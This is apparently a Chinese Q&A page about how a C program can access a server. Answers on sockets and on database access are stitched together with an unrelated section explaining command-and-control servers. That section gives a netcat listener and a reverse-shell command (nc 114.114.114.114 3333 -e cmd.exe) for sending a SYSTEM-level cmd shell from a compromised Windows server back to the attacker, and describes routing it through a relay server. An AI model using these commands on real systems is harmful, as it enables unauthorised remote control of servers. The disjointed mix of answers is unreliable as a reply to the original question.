c语言访问服务器

lz要先知道什么是socket，它是TCP/IP协议的API。再上层是http udp之类传输报文协议。而什么是服务器，如你所说tomcat服务器，他是一个http(s)服务器。处理由客户发送的HTTP报文。并返回报文给客户。

简单来说，http就是socket的一个封装。所以c语言使用socket理所当然能访问任何服务器。至于使用什么格式，你可以看看HTTP报文格式。

C&C

服务器的全称是

Command

and

Control

Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个

webshell

的时候，需要对服务器进行提权操作，如果是一台

windows

的服务器，提权的时候通常是利用本地提权漏洞的

exp

进行溢出提权，有些

exp

可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的

exp

溢出成功之后是返回一个

system

权限的

cmd，这时就需要将低权限的

cmd

shell

反弹回本地，这里用

nc

在本地执行：nc

-vv

-lp

3333

上述命令的意思是在本地监听一个

3333

端口等待连接，假设电脑

IP

是公网的，并且

IP

为

114.114.114.114，然后在目标服务器就可以执行：nc

114.114.114.114

3333

-e

cmd.exe

上面的命令就可以把远程服务器的服务器权限的

cmd

shell

返回到本地，这时你就可以通过

nc

建立的这个

shell

进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的

C&C

服务器。

扩展资料：

C&C

服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网

IP

地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网

IP

的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

可以通过直接访问服务器端数据库完成。不过在访问的过程中，为了安全考虑。可以先将客户端发送的数据转码或者加密。然后到服务器端后解密或者再转码。管理员可以通过B/S程序完成查看功能。C/S和B/S用同一个库就可以了。如果连的是外网，就要考虑很多安全因素。

---